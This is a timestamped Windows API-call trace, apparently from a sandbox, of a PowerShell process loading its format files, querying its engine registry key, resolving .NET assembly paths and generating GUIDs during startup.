	[0625.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.892] CoTaskMemFree (pv=0x1b8c08b0) 
	[0625.892] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0625.892] GetFileType (hFile=0x300) returned 0x1
	[0625.892] SetErrorMode (uMode=0x1) returned 0x1
	[0625.892] GetFileType (hFile=0x300) returned 0x1
	[0625.893] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.894] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.895] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.895] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.896] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.897] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.897] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x9e2, lpOverlapped=0x0) returned 1
	[0625.897] ReadFile (in: hFile=0x300, lpBuffer=0x33a3a9a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3a9a*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0625.897] ReadFile (in: hFile=0x300, lpBuffer=0x33a4550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33a4550*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0625.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x300) returned 0x0
	[0625.898] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0625.898] CoTaskMemAlloc (cb=0x5a) returned 0x4cd4e0
	[0625.898] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4cd4e0, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0625.898] CoTaskMemFree (pv=0x4cd4e0) 
	[0625.898] RegCloseKey (hKey=0x300) returned 0x0
	[0625.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0625.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0626.723] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa191f58, Data2=0xf079, Data3=0x4b66, Data4=([0]=0xa3, [1]=0x15, [2]=0x84, [3]=0x6b, [4]=0x27, [5]=0xe4, [6]=0x9f, [7]=0xc))) returned 0x0
	[0626.738] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x613e0a24, Data2=0xc97c, Data3=0x4cfa, Data4=([0]=0xaf, [1]=0xfb, [2]=0x80, [3]=0x26, [4]=0x38, [5]=0xc6, [6]=0xc, [7]=0x67))) returned 0x0
	[0626.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.741] SetErrorMode (uMode=0x1) returned 0x1
	[0626.741] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0626.741] GetFileType (hFile=0x300) returned 0x1
	[0626.742] SetErrorMode (uMode=0x1) returned 0x1
	[0626.742] GetFileType (hFile=0x300) returned 0x1
	[0626.742] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.743] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.743] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.744] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.744] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.746] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0xfb2, lpOverlapped=0x0) returned 1
	[0626.746] ReadFile (in: hFile=0x300, lpBuffer=0x33ce7d2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ce7d2*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0626.747] ReadFile (in: hFile=0x300, lpBuffer=0x33cf0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x33cf0b8*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0626.747] CloseHandle (hObject=0x300) returned 1
	[0626.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.747] SetErrorMode (uMode=0x1) returned 0x1
	[0626.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0626.747] SetErrorMode (uMode=0x1) returned 0x1
	[0626.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x300) returned 0x0
	[0626.748] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0626.748] CoTaskMemAlloc (cb=0x5a) returned 0x4cd4e0
	[0626.748] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4cd4e0, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0626.748] CoTaskMemFree (pv=0x4cd4e0) 
	[0626.748] RegCloseKey (hKey=0x300) returned 0x0
	[0626.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0627.498] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc344dde1, Data2=0x3bae, Data3=0x483b, Data4=([0]=0x92, [1]=0xaf, [2]=0x49, [3]=0xc0, [4]=0xca, [5]=0x56, [6]=0x12, [7]=0x3c))) returned 0x0
	[0627.501] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x75aa1234, Data2=0xa4fc, Data3=0x4d89, Data4=([0]=0xbc, [1]=0x4e, [2]=0x0, [3]=0x54, [4]=0xd8, [5]=0xe5, [6]=0x97, [7]=0x56))) returned 0x0
	[0627.501] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa46a8677, Data2=0xccac, Data3=0x4157, Data4=([0]=0x8e, [1]=0x16, [2]=0xdc, [3]=0xf8, [4]=0x4b, [5]=0xfb, [6]=0x36, [7]=0xbf))) returned 0x0
	[0627.502] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x685dcadf, Data2=0x13e4, Data3=0x4cf7, Data4=([0]=0xa1, [1]=0x1b, [2]=0x49, [3]=0x10, [4]=0x1, [5]=0xf1, [6]=0xb, [7]=0xd))) returned 0x0
	[0627.502] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x2b48eb03, Data2=0xf9bb, Data3=0x42a0, Data4=([0]=0xae, [1]=0x7e, [2]=0x17, [3]=0x80, [4]=0xe0, [5]=0xaf, [6]=0x5e, [7]=0x17))) returned 0x0
	[0627.502] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xaa771222, Data2=0x90aa, Data3=0x44e8, Data4=([0]=0x89, [1]=0x76, [2]=0x64, [3]=0xb2, [4]=0x5d, [5]=0x97, [6]=0x7c, [7]=0x7e))) returned 0x0
	[0627.503] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0627.503] GetFileType (hFile=0x300) returned 0x1
	[0627.503] SetErrorMode (uMode=0x1) returned 0x1
	[0627.503] GetFileType (hFile=0x300) returned 0x1
	[0627.503] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.506] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.507] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.507] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.509] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.511] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.512] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0xaca, lpOverlapped=0x0) returned 1
	[0627.512] ReadFile (in: hFile=0x300, lpBuffer=0x341a44a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341a44a*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0627.512] ReadFile (in: hFile=0x300, lpBuffer=0x341ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x341ae18*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0627.512] CloseHandle (hObject=0x300) returned 1
	[0627.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.512] SetErrorMode (uMode=0x1) returned 0x1
	[0627.513] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0627.513] SetErrorMode (uMode=0x1) returned 0x1
	[0627.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x300) returned 0x0
	[0627.514] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0627.514] CoTaskMemAlloc (cb=0x5a) returned 0x4cd4e0
	[0627.514] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4cd4e0, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0627.514] CoTaskMemFree (pv=0x4cd4e0) 
	[0627.514] RegCloseKey (hKey=0x300) returned 0x0
	[0627.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0627.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0627.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0627.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0627.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0627.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0627.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0627.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0628.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0628.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0628.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0628.351] VirtualQuery (in: lpAddress=0x24bb20, lpBuffer=0x24c9e0, dwLength=0x30 | out: lpBuffer=0x24c9e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.353] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x7f5986b4, Data2=0xd112, Data3=0x4062, Data4=([0]=0xa3, [1]=0x12, [2]=0xdc, [3]=0x9e, [4]=0x5, [5]=0xb2, [6]=0xd3, [7]=0x47))) returned 0x0
	[0628.354] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe95c5c2a, Data2=0x72c3, Data3=0x499b, Data4=([0]=0xa0, [1]=0xec, [2]=0xb5, [3]=0x5c, [4]=0xc8, [5]=0x11, [6]=0xa, [7]=0xa))) returned 0x0
	[0628.355] VirtualQuery (in: lpAddress=0x24bcd0, lpBuffer=0x24cb90, dwLength=0x30 | out: lpBuffer=0x24cb90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.356] VirtualQuery (in: lpAddress=0x24bcd0, lpBuffer=0x24cb90, dwLength=0x30 | out: lpBuffer=0x24cb90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.358] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa5abf6d5, Data2=0x375e, Data3=0x4cb4, Data4=([0]=0xbd, [1]=0x1e, [2]=0xe7, [3]=0x8f, [4]=0xb3, [5]=0x76, [6]=0x11, [7]=0xe9))) returned 0x0
	[0628.360] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4953b09d, Data2=0x39c6, Data3=0x4597, Data4=([0]=0xa8, [1]=0x60, [2]=0x34, [3]=0x3, [4]=0x6a, [5]=0xab, [6]=0x8a, [7]=0x6))) returned 0x0
	[0629.088] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x6053e050, Data2=0x1bd7, Data3=0x4e5f, Data4=([0]=0x86, [1]=0xf7, [2]=0x2e, [3]=0x4f, [4]=0x1b, [5]=0x1b, [6]=0x85, [7]=0x4c))) returned 0x0
	[0629.089] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0629.089] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8321c8f6, Data2=0x8082, Data3=0x4f65, Data4=([0]=0xbd, [1]=0x3c, [2]=0xec, [3]=0xd, [4]=0x0, [5]=0x7a, [6]=0x14, [7]=0x26))) returned 0x0
	[0629.089] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x3e770d27, Data2=0x180e, Data3=0x4c51, Data4=([0]=0x9e, [1]=0x3f, [2]=0x46, [3]=0xd5, [4]=0x42, [5]=0x74, [6]=0xb0, [7]=0x13))) returned 0x0
